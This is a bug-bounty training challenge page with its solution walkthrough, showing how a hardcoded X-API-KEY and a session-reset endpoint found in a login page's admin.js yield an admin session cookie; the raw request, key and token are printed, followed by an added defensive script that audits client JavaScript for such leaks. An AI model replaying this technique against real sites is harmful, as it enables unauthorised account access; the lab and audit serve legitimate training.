Important information
Our challenges do NOT require any bruteforcing/directory fuzzing/massive amounts of traffic. Please practise hacking on our challenges manually.
Failure to abide by the rules will put you at risk of being restricted from using our free challenges.
What's behind this admin panel?
Medium
Misc / Application Logic
You are faced with a login panel, but what do you do? Close the tab and find something else? Of course not, you try to find what's behind the login page!
Investigate the login page and see if you can find a way to grab the admin's session cookies to authenticate as the admin.
Completed the challenge?
You can browse the intended solution to this challenge below.
Solution
This is based on a real P1 finding which allowed me into an admin panel and allowed me to enumerate users' private information. All of their API endpoints were contained in .js files.
Viewing the source of the page, you'll discover /app.js, which shows:
/*
$.ajax({
    url: 'redirect.php',
    type: 'POST',
    data: 'username=' + uname + '&pwd=' + pwd,
    success: function(result) {
        window.location.href="/adminhome.php";
    }
});
*/
However, you already know about that request; what's interesting is where it redirects to if successful!
Onwards to visit /adminhome.php
Oh wait. We get redirected.
But did you notice it was a META REFRESH, and some HTML was in the response? Let's investigate.
In the <head> you will find admin.js, which reveals:
function resetSession() {
    function reqListener () {
        document.cookie = "thesesh="+this.responseText;
        location.reload();
    }
    var oReq = new XMLHttpRequest();
    oReq.addEventListener("load", reqListener);
    oReq.open("GET", "http://www.bugbountytraining.com/challenges/AdminPanel/resetsession.php");
    oReq.setRequestHeader("X-API-KEY","3a24b51d-3b36-4e45-8f95-8903cd813611");
    oReq.send();
}
Interesting. So by sending a request to /resetsession.php with the X-API-KEY header, we can reset the session? Let's try this!
GET /challenges/AdminPanel/resetsession.php HTTP/1.1
Host: www.bugbountytraining.com
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
X-API-KEY:3a24b51d-3b36-4e45-8f95-8903cd813611
Response: cXp1QjF4aFRwcjM3RW01anA5YkVmQT09
And from there we can see the code sets this as the value for the cookie, thesesh.
Set this as your cookie and you're in!
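The root cause here is a credential and internal endpoints shipped in static JavaScript. The following pre-deploy audit for that pattern is an added example, not part of the original write-up or the challenge's code. The function name `auditClientJs`, the header list and the sample input (with a placeholder key) are assumptions constructed for illustration.

```javascript
// Added example: audit client-side JS for secrets and endpoints that reach the browser.
// SAMPLE_JS is constructed, modelled on the admin.js pattern; the key is a placeholder.
const SAMPLE_JS = `
/*
$.ajax({ url: 'redirect.php', type: 'POST',
  success: function(result) { window.location.href="/adminhome.php"; } });
*/
function resetSession() {
  var oReq = new XMLHttpRequest();
  oReq.open("GET", "/resetsession.php");
  oReq.setRequestHeader("X-API-KEY", "00000000-0000-0000-0000-000000000000");
  oReq.setRequestHeader("Accept", "application/json");
  oReq.send();
}`;

// Header names that should never carry a literal value in shipped JS (assumed list).
const SECRET_HEADER = /^(x-api-key|authorization|x-auth-token|x-access-token)$/i;

function auditClientJs(source) {
  const findings = [];
  const lineOf = (idx) => source.slice(0, idx).split("\n").length;

  // 1. setRequestHeader("<secret header>", "<string literal>")
  const hdr = /setRequestHeader\(\s*(["'])([^"']+)\1\s*,\s*(["'])([^"']*)\3\s*\)/g;
  for (const m of source.matchAll(hdr)) {
    if (SECRET_HEADER.test(m[2])) {
      findings.push({ type: "hardcoded-secret-header", header: m[2], line: lineOf(m.index) });
    }
  }

  // 2. Server-side script paths left inside block comments (dead code still ships).
  for (const c of source.matchAll(/\/\*[\s\S]*?\*\//g)) {
    for (const p of c[0].matchAll(/(["'])(\/?[\w\/.-]+\.(?:php|aspx?|jsp))\1/g)) {
      findings.push({ type: "endpoint-in-comment", path: p[2], line: lineOf(c.index + p.index) });
    }
  }
  return findings;
}

console.log(auditClientJs(SAMPLE_JS));
```

A finding of either type means the value is readable by any unauthenticated visitor, so the fix belongs on the server: the session-issuing endpoint must require an authenticated session rather than a static key.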